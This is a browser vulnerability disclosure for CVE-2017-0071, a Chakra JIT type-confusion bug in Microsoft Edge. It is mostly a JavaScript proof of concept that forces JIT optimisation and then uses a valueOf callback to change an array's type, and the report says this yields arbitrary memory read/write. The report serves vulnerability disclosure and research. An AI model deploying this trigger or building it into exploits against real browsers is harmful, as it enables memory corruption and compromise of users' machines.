Microsoft Edge: Chakra incorrect jit optimization with TypedArray setter. 

CVE-2017-0071


PoC:

"use strict";

function func(a, b, c) {
    a[0] = 1.2;
    b[0] = c; <<<<----------------------- (1)
    a[1] = 2.2;
    a[0] = 2.3023e-320;
}

function main() {
    var a = [1.1, 2.2];
    var b = new Uint32Array(100);

    // force to optimize
    for (var i = 0; i < 0x10000; i++)
        func(a, b, i);

    func(a, b, {valueOf: () => {
        a[0] = {}; <<<<----------------------- (2)

        return 0;
    }});

    a[0].toString();
}

main();

In the above code, Chakra assumes that the type of |a| will be still a native float array after executing (1), even we could change its type with the valueOf handler( (2) ). So it could result in type confusion.

The attached PoC will reproduce arbitrary memory read/write.

Tested on Microsoft Edge 38.14393.0.0.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt